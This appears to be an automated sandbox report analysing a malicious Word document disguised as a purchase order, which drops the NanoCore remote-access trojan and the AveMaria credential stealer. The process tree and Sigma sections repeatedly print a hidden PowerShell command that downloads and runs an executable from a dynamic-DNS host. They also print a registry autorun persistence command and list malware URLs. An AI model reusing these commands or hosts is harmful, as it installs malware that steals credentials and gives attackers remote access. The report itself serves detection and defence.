Windows Analysis Report NEW PO1100372954 -.doc

Overview

General Information

Sample Name: NEW PO1100372954 -.doc
Analysis ID: 457815
MD5: afe48e30fc3f12c2b6ad7d19ae1fff8e
SHA1: 2ded99867d8b3e9499b10743ae732efec19ccc8e
SHA256: ecef57afce8a7d5eed2080401da0ce36d67c2493cf1385b432a6bf0a65f6e521
Tags: doc

Detection

NanoCore AveMaria
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: NanoCore
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected AveMaria stealer
Yara detected Nanocore RAT
.NET source code contains very large strings
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Document exploit detected (process start blacklist hit)
Found suspicious RTF objects
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides user accounts
Increases the number of concurrent connection per server for Internet Explorer
Injects a PE file into a foreign processes
Injects files into Windows application
Installs a global keyboard hook
Machine Learning detection for dropped file
Microsoft Office creates scripting files
Office process drops PE file
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create new users
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Exploit for CVE-2017-0261
Sigma detected: PowerShell Download from URL
Sigma detected: Verclsid.exe Runs COM Object
Spawns drivers
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2604 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • powershell.exe (PID: 2396 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • FLTLDR.EXE (PID: 3048 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT MD5: AF5CCD95BAC7ADADD56DE185D7461B2C)
    • powershell.exe (PID: 1068 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • putty.exe (PID: 2952 cmdline: 'C:\Users\user\AppData\Roaming\putty.exe' MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
        • putty.exe (PID: 2308 cmdline: C:\Users\user\AppData\Roaming\putty.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
          • cmd.exe (PID: 2156 cmdline: cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
            • reg.exe (PID: 2400 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe' MD5: D69A9ABBB0D795F21995C2F48C1EB560)
          • images.exe (PID: 2168 cmdline: C:\ProgramData\images.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
            • images.exe (PID: 2820 cmdline: C:\ProgramData\images.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
              • cmd.exe (PID: 912 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
              • iBCrDCK.i.exe (PID: 2340 cmdline: 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe' MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
                • iBCrDCK.i.exe (PID: 2260 cmdline: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
                • iBCrDCK.i.exe (PID: 2428 cmdline: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
    • powershell.exe (PID: 3056 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • putty.exe (PID: 2948 cmdline: 'C:\Users\user\AppData\Roaming\putty.exe' MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
        • putty.exe (PID: 1492 cmdline: C:\Users\user\AppData\Roaming\putty.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
        • putty.exe (PID: 2260 cmdline: C:\Users\user\AppData\Roaming\putty.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
        • putty.exe (PID: 2428 cmdline: C:\Users\user\AppData\Roaming\putty.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
    • verclsid.exe (PID: 1900 cmdline: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2416 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT' MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • drvinst.exe (PID: 1464 cmdline: DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '000000000000059C' '0000000000000600' MD5: 2DBA1472BDF847EAE358A4B9FA9AB0C1)
  • rdpdr.sys (PID: 4 cmdline: MD5: 1B6163C503398B23FF8B939C67747683)
  • tdtcp.sys (PID: 4 cmdline: MD5: 51C5ECEB1CDEE2468A1748BE550CFBC8)
  • tssecsrv.sys (PID: 4 cmdline: MD5: 19BEDA57F3E0A06B8D5EB6D619BD5624)
  • RDPWD.SYS (PID: 4 cmdline: MD5: FE571E088C2D83619D2D48D4E961BF41)
  • smtpsvc.exe (PID: 2964 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
    • smtpsvc.exe (PID: 764 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security |
00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth |
  • 0x5b0b:$x1: NanoCore.ClientPluginHost
  • 0x5b44:$x2: IClientNetworkHost
00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth |
  • 0x5b0b:$x2: NanoCore.ClientPluginHost
  • 0x5c0f:$s4: PipeCreated
  • 0x5b25:$s5: IClientLoggingHost
00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth |
  • 0x5b99:$x1: NanoCore.ClientPluginHost
  • 0x5bb3:$x2: IClientNetworkHost
(first entries of 90 shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth |
  • 0x350b:$x1: NanoCore.ClientPluginHost
  • 0x3525:$x2: IClientNetworkHost
34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth |
  • 0x350b:$x2: NanoCore.ClientPluginHost
  • 0x52b6:$s4: PipeCreated
  • 0x34f8:$s5: IClientLoggingHost
34.2.iBCrDCK.i.exe.34ffadc.25.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth |
  • 0xd9ad:$x1: NanoCore.ClientPluginHost
  • 0xd9da:$x2: IClientNetworkHost
34.2.iBCrDCK.i.exe.34ffadc.25.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth |
  • 0xd9ad:$x2: NanoCore.ClientPluginHost
  • 0xea88:$s4: PipeCreated
  • 0xd9c7:$s5: IClientLoggingHost
34.2.iBCrDCK.i.exe.34ffadc.25.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security |
(first entries of 140 shown)

Sigma Overview

AV Detection:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

E-Banking Fraud:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396
Sigma detected: PowerShell DownloadFile
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396
Sigma detected: Direct Autorun Keys Modification
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', CommandLine: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2156, ProcessCommandLine: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', ProcessId: 2400
Sigma detected: Exploit for CVE-2017-0261
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, CommandLine: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, CommandLine|base64offset|contains: , Image: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, NewProcessName: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, OriginalFileName: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, ProcessId: 3048
Sigma detected: PowerShell Download from URL
Source: Process started; Author: Florian Roth, oscd.community, Jonhnathan Ribeiro; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396
Sigma detected: Verclsid.exe Runs COM Object
Source: Process started; Author: Victor Sergeev, oscd.community; Data: Command: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 1900
Sigma detected: Group Modification Logging
Source: Event Logs; Author: Alexandr Yampolskyi, SOC Prime; Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-966771315-3019405637-367336477-1007, data 2: None, data 3: user-PC, data 4: S-1-5-21-966771315-3019405637-367336477-513, data 5: S-1-5-21-966771315-3019405637-367336477-1006, data 6: user, data 7: user-PC, data 8: 0x14825, data 9: -
Sigma detected: Local User Creation
Source: Event Logs; Author: Patrick Bareiss; Data: EventID: 4720, Source: Microsoft-Windows-Security-Auditing, data 0: eC.vaAf, data 1: user-PC, data 10: -, data 11: %%1793, data 12: %%1793, data 13: %%1793, data 14: %%1793, data 15: %%1793, data 16: %%1794, data 17: %%1794, data 18: 513, data 19: -, data 2: S-1-5-21-966771315-3019405637-367336477-1007, data 20: 0x0, data 21: 0x15, data 22: %%2080 %%2082 %%2084, data 23: %%1793, data 24: -, data 25: %%1797, data 3: S-1-5-21-966771315-3019405637-367336477-1006, data 4: user, data 5: user-PC, data 6: 0x14825, data 7: -, data 8: eC.vaAf, data 9: %%1793
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396

Data Obfuscation:

Sigma detected: Powershell download and execute file
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396

Stealing of Sensitive Information:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Remote Access Functionality:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://hutyrtit.ydns.eu/microC.exe; Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe; ReversingLabs: Detection: 19%
Source: C:\Program Files\Microsoft DN1\sqlmap.dll; Metadefender: Detection: 20%
Source: C:\Program Files\Microsoft DN1\sqlmap.dll; ReversingLabs: Detection: 42%
Source: C:\ProgramData\images.exe; ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe; ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe; ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe; ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Roaming\putty.exe; ReversingLabs: Detection: 28%
Multi AV Scanner detection for submitted file
Source: NEW PO1100372954 -.doc; ReversingLabs: Detection: 23%
Yara detected AveMaria stealer
Yara detected Nanocore RAT
        Machine Learning detection for dropped file
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\images.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\putty.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exeJoe Sandbox ML: detected
        Source: 21.2.images.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: 15.2.putty.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpackAvira: Label: TR/Dropper.Gen
        Source: 34.2.iBCrDCK.i.exe.440000.4.unpackAvira: Label: TR/NanoCore.fadte
        Source: 13.2.putty.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,13_2_0040A8C3
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,13_2_0040C261
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,13_2_0040C3B9
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,13_2_0040C419
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,13_2_00409D97
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,13_2_0040C6BD
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,15_2_0040A8C3
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,15_2_0040C261
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,15_2_0040C3B9
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,15_2_0040C419
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,15_2_00409D97
